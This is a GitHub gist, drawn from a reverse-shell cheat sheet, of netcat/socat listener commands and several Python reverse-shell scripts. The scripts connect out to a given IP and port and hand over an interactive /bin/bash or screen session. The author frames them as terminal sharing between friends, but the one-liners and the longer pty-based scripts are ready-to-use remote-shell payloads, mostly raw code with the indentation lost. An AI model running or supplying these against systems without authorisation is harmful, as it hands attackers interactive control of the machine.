Skip to content

Instantly share code, notes, and snippets.

@dergachev
Last active June 11, 2023 18:05
Show Gist options
  • Save dergachev/7913990 to your computer and use it in GitHub Desktop.
Save dergachev/7913990 to your computer and use it in GitHub Desktop.
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# on the CLIENT, run the following:
# nc -l 12345
# on the SERVER, start the "reverse shell"
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345
# now go to the CLIENT, listen on port 12345 for incoming shell connections
nc -l 12345
# that worked, but note that 'nc' does a terrible job emulating a tty
# (arrows keys aren't sent correctly, don't even try launching vim)
# instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat"
# launch socat, asking it to to talk forward all traffic on 12345 to /dev/ttys003 (raw,echo=0 fix tty issues)
socat `tty`,raw,echo=0 tcp-listen:12345
# enjoy
##
## with gnu screen, to get share a screen session on the network
##
# first ensure you are in a screen session
screen -R
# now start a python job to share it in the background
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &
# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
##
## poor man's screencast - adapted from http://mrnugget.github.io/blog/2013/08/11/named-pipes/
## assumes your friend on 192.168.2.183 runs "nc -l 9999"
## then you can stream the contents of your terminal (read-only!) to him as follows:
## bonus trick: if you want to save your friend's otherise discarded keystrokes, redirect to a file instead of /dev/null
##
script -t 0 >(nc 192.168.2.183 9999 > /dev/null)

TODO:

import sys,socket,os,fcntl,struct,pty,termios
count = 0
def fix_window_size(fd):
global count
if count == 0:
count = 1
zeroes = struct.pack('HHHH', 0, 0, 0, 0)
size_info = fcntl.ioctl(1, termios.TIOCGWINSZ, zeroes)
rows, cols = struct.unpack('HHHH', size_info)[0:2]
size_info = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, size_info)
_,ip,port=sys.argv
s = socket.socket()
s.connect((ip,int(port)))
os.dup2(s.fileno(),0)
def socket_read(fd):
fix_window_size(fd)
data = os.read(fd, 1024)
os.write(s.fileno(),data)
return data
pty.spawn(['/bin/bash','-i'], socket_read)
import sys,socket,os,fcntl,termios,array,select
_,ip,port=sys.argv
print "Opening connection..."
remote = socket.socket()
remote.connect((ip,int(port)))
print "Launching bash..."
pid, fd = os.forkpty()
if pid == 0: # CHILD
os.execlp('/bin/bash', '-i')
# fix window size
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
print "Starting loop..."
while 1:
avail,_,_ = select.select([fd,remote,sys.stdin], [], [])
if fd in avail:
data = os.read(fd, 1024)
os.write(remote.fileno(),data)
os.write(sys.stdout.fileno(), data)
if remote in avail:
data = os.read(remote.fileno(), 1024)
os.write(fd, data)
if sys.stdin in avail:
data = os.read(sys.stdin.fileno(), 1024)
os.write(fd, data)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment